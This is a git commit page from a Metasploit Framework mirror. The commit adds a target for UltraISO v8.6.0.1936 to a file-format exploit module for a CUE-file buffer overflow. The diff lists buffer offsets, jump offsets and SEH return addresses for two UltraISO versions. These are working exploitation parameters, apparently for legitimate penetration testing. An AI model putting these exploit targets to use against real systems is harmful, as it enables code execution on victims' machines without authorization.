infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

add a target for v8.6.0.1936 

git-svn-id: file:///home/svn/framework3/trunk@8955 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Joshua Drake 2010-03-29 18:19:59 +00:00
parent e45a29fd4a
commit b2f3e91c8b
1 changed files with 8 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

12
modules/exploits/windows/fileformat/ultraiso_cue.rb
View File

@ -50,21 +50,25 @@ class Metasploit3 < Msf::Exploit::Remote
'Platform' => 'win',
'Targets' =>
[
# Tested OK on:
# v8.6.2.2011 (portable)
# BOF @ 0x005e1f8b
# The EXE base addr contains a bad char (nul). This prevents us from
# using the super-elite multi-offset SEH exploitation method.
[ 'Windows Universal',
[ 'Windows - UltraISO v8.6.2.2011 portable',
{
'Offset' => 1100,
'JmpOff' => 0x30, # offset from the end to our jmp
'Ret' => 0x00594740 # add esp, 0x64 / p/p/p/r in unpacked UltraISO.exe
}
],
[ 'Windows - UltraISO v8.6.0.1936',
{
'Offset' => 1100,
'JmpOff' => 0x30, # offset from the end to our jmp
'Ret' => 0x0059170c # add esp, 0x64 / p/p/p/r in unpacked UltraISO.exe
}
],
],
'Privileged' => false,
'DisclosureDate' => 'May 24 2007',